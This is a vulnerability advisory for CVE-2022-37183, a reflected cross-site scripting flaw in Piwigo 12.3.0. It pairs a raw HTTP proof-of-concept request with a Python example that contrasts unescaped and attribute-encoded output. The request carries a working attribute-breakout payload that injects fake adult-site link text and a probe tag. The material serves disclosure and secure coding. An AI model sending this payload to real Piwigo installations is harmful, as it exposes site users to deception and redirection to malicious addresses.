CVE-2022-37183: CVE-nu11secur1ty/vendors/Piwigo/2022/12.3.0 at main · nu11secur1ty/CVE-nu11secur1ty
Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list.
The value of the /search/1940/created-monthly-list request parameter is copied into the value of an HTML tag attribute that is enclosed in double quotation marks. An attacker can trick a user into visiting a crafted URL that points at this system. Depending on the scenario, the attacker can then trick the user into visiting a malicious address that the victim will believe is connected with the original web address. This can be dangerous for all users of this system.
GET /piwigo/index.php?/search/4863/created-monthly-list%22%3Ehttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotcomhttps:\pornhubdotco
mhttps:\pornhubdotcom%3CYZxWX%3E HTTP/1.1
Host: pwned_host.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: pwg_id=hctfqtab45adhogo2suhq2mr0c; ssc_phoneSwap=0
Upgrade-Insecure-Requests: 1
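
The root cause described above, a request value copied unencoded into a double-quoted attribute, shown beside the encoded form. This is an added example, not Piwigo's code or the advisory author's: the two template functions are hypothetical, and the sample query is constructed with the request's shape and its filler shortened to one word.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: same shape as the request on this page ("> breakout,
# filler text, then a probe tag), with the filler shortened to one word.
SAMPLE_QUERY = "/search/4863/created-monthly-list%22%3Efiller%3CYZxWX%3E"


def render_unsafe(value: str) -> str:
    """Hypothetical template: raw value inside a double-quoted attribute."""
    return '<a href="index.php?' + value + '">monthly list</a>'


def render_safe(value: str) -> str:
    """Same template with attribute-context encoding of ", <, >, & and '."""
    return '<a href="index.php?' + html.escape(value, quote=True) + '">monthly list</a>'


class TagCollector(HTMLParser):
    """Records every start tag and its attributes as the parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_tags(markup: str):
    """Tag names present beyond the single <a> the template intends."""
    return [name for name, _ in parse_tags(markup) if name != "a"]


if __name__ == "__main__":
    value = unquote(SAMPLE_QUERY)
    print("unsafe:", injected_tags(render_unsafe(value)))  # probe tag escapes
    print("safe:  ", injected_tags(render_safe(value)))    # nothing escapes
```

In PHP, the language Piwigo is written in, the same attribute-context encoding is done with htmlspecialchars() and the ENT_QUOTES flag.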